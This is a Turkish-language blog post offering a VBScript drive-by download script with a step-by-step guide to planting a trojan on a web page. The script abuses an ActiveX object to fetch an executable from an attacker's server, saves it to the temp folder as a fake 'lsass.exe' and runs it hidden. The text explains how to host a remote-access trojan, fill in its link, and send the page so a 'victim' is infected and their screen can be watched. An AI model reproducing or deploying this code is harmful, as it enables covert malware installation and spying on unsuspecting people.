<script language="VBScript">
on error resume next
Set obj1 = ********.createElement("object")
obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
est1="Microsoft."&"_xmlHTTP"A
Set obj2 = obj1.CreateObject(est1,"")
est="Ado"&"db."&"Str"&"eam"
set obj3 = obj1.createobject(est,"")
obj3.type = 1
est2="GET"
obj2.Open est2, "Serverınızın linki", False
obj2.Send
set F = obj1.createobject("Scripting.FileSystemObject","")
set pasta = F.GetSpecialFolder(2)
fi="lsass.exe"
fi= F.BuildPath(pasta,fi)
obj3.open
obj3.write obj2.responseBody
obj3.savetofile fi,2
obj3.close
set obj5 = obj1.createobject("Shell.Application","")
obj5.ShellExecute fi,"","","open",0
</script>
Merhaba arkadaşlar sizlere web sayfasına trojan gömmeyi anlatıcam.
Bu gördüğünüz kod sayesinde Yolu belirtilen serverımız siteye girilen kişinin bilgisayarı tarafından otomatik açılır.
Bu yöntem oldukça geçerlidir.Çünkü artık kimse msnde babasndan bile dosya almıyor.Ama sitede trojan olduğu çoğu kişinin hesabına gelmez.
Şimdi açıklamamı yapayım.
Serverınızın linki
Şimdi böyle bir kısım var.
Server nedir , Linkini nasıl alıcaz...
Server dediğimiz şey trojanlarda kendi bilgilerimizi ayarlayıp oluşturduğumuz dosyadır.Trojandan trojana özellikler değişir.Ama genelde mantık aynıdır.Karşı taraf exe yi açtığı zaman Bilgisayarında port açılır yani otomatik bi açık bırakılır.Ve bu sayede dosyayı yedirdiğimiz kişinin Ekranını bile izleyebiliriz.
Ben trojan olarak Turkojanı kullanıyorum.
Şimdi serverımızı oluşturduk diyelim Link nasıl alıcaz.
İlk önce bi web siteniz olması gerekiyor.Ücretsizde olabilir.
Örneğin www.iamcihan.com diye sitem olsun benim.
Ftp den bağlanıp benim server.exe mi anadizine atıyorum.
Ve link şöyle oluyor http://www.iamcihan.com/server.exe
Buraya yüklendikten sonra internet explorerdan bu linki açıp kontrol ediyoruz.Bunu açtığınızda Çalıştır - Kaydet - İptal çıkar.Eğer çıkarsa olmuştur.Çıkmazsa sitenizin sunucusu güvenlik tarafından serverdaki exe uzantılarının çalıştırılmasını engellemiştir.Eğer öyleyse çalışmaz.
Yani serverınızı attığnız zaman mutlaka linke girdiğiniz zaman Çalıştır-Kaydet-İptal dalgası çıkması lazım.
Evet yapılacaklar bu kadar.
Özet olarak ; Servermızı oluşturduk ... server.exe
Sitemize upload ettik http://www.emre.com/server.exe oldu
Bu verdiğim kodları alın.Not defterine atın.
Kodun Serverınızın linki Kısmına "http://www.siteisminiz.com/server.exe"
yazın.Daha sonra farkı kaydet deyip.
.html uzantılı kaydedin.Mesela emre.html diye kaydettim.
o zmn http://www.cihan.com/cihan.html olur
Bu linki karşı tarafa attığım zaman.Kodlar sayesinde otomatik olarak ana dizindeki server.exe çalışacaktır.Ve Kurbanımız trojanı yemiş olacaktır.
Hiç yorum yok:
Yorum Gönder
Not: Yalnızca bu blogun üyesi yorum gönderebilir.